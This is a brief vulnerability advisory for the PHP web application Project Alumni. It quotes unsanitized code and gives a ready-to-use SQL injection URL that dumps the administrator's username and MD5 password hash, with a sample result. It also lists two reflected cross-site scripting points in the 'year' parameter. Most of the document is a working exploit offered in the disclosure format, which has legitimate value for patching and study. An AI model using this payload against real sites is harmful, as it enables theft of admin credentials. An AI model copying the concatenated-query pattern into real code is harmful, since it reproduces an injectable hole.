Project Alumni versions 1.0.9, 1.0.8, and possibly prior releases suffer from cross site scripting and SQL injection vulnerabilities.
ac4295d45d89f5c92cf220bd4f9ff1addec222418dbd42811ba1402402e576dc
project-alumni sql injection & xss
author : tomplixsee
tomplixsee@yahoo.co.id
--------------------------------------------------------------------------
affected software version : project alumni 1.0.9, 1.0.8, or lower??
download : https://sourceforge.net/projects/project-alumni/
vulnerability
=============
1.sql injection
++++++++++++++++
vulnerable code on view.page.inc.php:
$result = dbQuery("SELECT * FROM `".getConfigVal("sqlTablePrefix",2)."_users` WHERE `alumniYear` = '".$_GET['year']."'");
exploit:
http://victim/path/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
result example:
________________________________________________________________________________
|Name |Email |
|--------------------------------------------------------------------------------|
| tomplixsee (1) f25a2fc72690b780b2a14e140ef6a9e0 |Not Available |
|--------------------------------------------------------------------------------|
tomplixsee is admin's username and f25a2fc72690b780b2a14e140ef6a9e0 is md5 encrypt from admin's password.
2.xss
++++++
vulnerable code:
_____________________________________________________________________________________
#/xml/index.php
#
# <?php
# if(isset($_GET["year"])){
# $year = $_GET["year"];
# }
# if($year=='FRND')
# $yearText = "Friends of ".getConfigVal("schoolAbbr",2)." Alumni";
# else
# $yearText = "Class of $year";
# ?>
# .....
# <?php echo"$yearText";?>
# .....
#
#exploit:
#http://victim/path/xml/index.php?year=<xss>
#_____________________________________________________________________________________
#/index.php
#
# <?php if(!$_GET['year']) { ?>
# ....
# <?php } else if ($_GET['year'] < getConfigVal("alumniStartYear",2)) { ?>
# ....
# <?php } else { ?>
# <h2>Alumni for the Graduating Year of <?php echo $_GET['year'] ?></h2>
#
#exploit
#http://victim/path/index.php?act=view&year=<xss>
#______________________________________________________________________________________
thanks to:
anak-anak jaringan sukabirus, all my friends at stt telkom, jasakom community,
sibalbal, crutz_ao, bidulux, akillers 179...........